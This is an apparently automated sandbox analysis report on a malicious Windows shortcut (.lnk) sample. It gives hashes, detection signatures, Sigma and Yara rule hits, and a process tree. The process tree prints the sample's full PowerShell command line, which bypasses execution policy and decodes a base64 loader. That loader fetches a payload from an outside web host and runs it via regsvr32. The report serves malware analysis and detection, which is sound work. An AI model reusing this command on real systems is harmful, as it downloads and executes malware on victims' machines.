Edit tour
Windows
Analysis Report
DRlFlg7OV8.lnk
Overview
General Information
Sample name: | DRlFlg7OV8.lnkrenamed because original name is a hash value |
Original sample name: | 09f44c33ba0a5f1e22cd5b8b0d40c9808e2668ee9050ac855a6ae0744bc9e924.lnk |
Analysis ID: | 1583270 |
MD5: | 3952caf999263773be599357388159e0 |
SHA1: | 76c39a3a4823beab79e497bfcdbc2367188d95c4 |
SHA256: | 09f44c33ba0a5f1e22cd5b8b0d40c9808e2668ee9050ac855a6ae0744bc9e924 |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for sample
Powershell creates an autostart link
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64_ra
- powershell.exe (PID: 6984 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command O ut-String -InputObje ct "SRW735 125373WM.l nk " | Out-N ull; [Syst em.Text.En coding]::A SCII.GetSt ring([Syst em.Convert ]::FromBas e64String( 'JFByb2dyZ XNzUHJlZmV yZW5jZT0iU 2lsZW50bHl Db250aW51Z SI7SVdSIGh 0dHA6Ly9mb 2N1c21lZGl jYS5pbi9mb WxpYi9JeEJ BQk1oMEkyY 0xNM3FxMUd Wdi8gLU91d EZpbGUgJGV udjpURU1QL 3puc3JQZWN YVmIuZE1vO 1JlZ3N2cjM yLmV4ZSAkZ W52OlRFTVA vem5zclBlY 1hWYi5kTW8 =')) > "C: \Users\use r\AppData\ Local\Temp \gjRzEyUDT V.ps1" ; p owershell -execution policy byp ass -file "C:\Users\ user\AppDa ta\Local\T emp\gjRzEy UDTV.ps1"; Remove-It em "C:\Use rs\user\Ap pData\Loca l\Temp\gjR zEyUDTV.ps 1" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6992 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6440 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -execution policy byp ass -file C:\Users\u ser\AppDat a\Local\Te mp\gjRzEyU DTV.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9) - regsvr32.exe (PID: 6520 cmdline:
"C:\Window s\system32 \regsvr32. exe" C:\Us ers\user\A ppData\Loc al\Temp/zn srPecXVb.d Mo MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
- svchost.exe (PID: 6344 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |